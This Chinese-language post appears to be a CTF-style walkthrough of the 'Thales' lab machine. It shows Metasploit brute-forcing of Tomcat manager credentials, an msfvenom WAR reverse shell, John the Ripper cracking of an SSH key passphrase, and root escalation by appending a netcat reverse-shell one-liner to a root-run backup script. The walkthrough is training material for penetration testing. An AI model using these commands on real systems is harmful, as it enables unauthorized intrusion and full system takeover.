THALES

发表于 更新于 分类于 阅读次数: 本文字数: 934 阅读时长 ≈ 1 分钟

外网打点

信息搜集

使用nmap -sn 10.0.2.0/24获取主机的IP地址为10.0.2.16

image-20230614104516425

使用nmap -sC -sV -p 1-10000 -o result.txt 10.0.2.16获取主机的端口信息

image-20230614104505180

访问http服务,发现是tomcat的网站,使用msf爆破其密码

1
2
3
4
use scanner/http/tomcat_mgr_login
set rhosts 10.0.2.16
set username tomcat
run

image-20230614104708224

image-20230614104805728

image-20230614104906353

获取到账号tomcat,密码role1

使用其登录tomcat的管理后台

漏洞利用

image-20230614105022290

进入服务器管理,然后进入应用程序列表

image-20230614105136229

可以上传war包,使用msfvenom生成一个war的反弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.2.15 LPORT=7777 -f war -o revshell.war

image-20230614105256097

进行上传,然后点击部署。

监听本地端口,然后运行反弹shell

image-20230614105340017

image-20230614105353475

内网渗透

我们先进行稳定shell

1
2
3
4
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo;fg;
reset

image-20230614105522250

进入home目录下的用户目录,user.txt发现没有权限读取,但是我们可以使用.ssh里面的私钥进行登录

image-20230614105714503

下载私钥之后使用ssh2john id_rsa > hash对生成的密码进行爆破,保存秘钥到本地

然后使用john --wordlist=/usr/share/wordlists/rockyou.txt hash进行爆破密码

1282531-20211207123628384-1533936825

得到密码vodka06,用户进行切换

image-20230614111304990

image-20230614111321296

提权

查看backup.sh

image-20230614111351807

这个文件是root身份运行的,我们可以使用其来反弹shell

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.15 8888 >/tmp/f” >> backup.sh

image-20230614111529099

监听端口,过一会就可以获取到shell了

image-20230614112010536

image-20230614112039652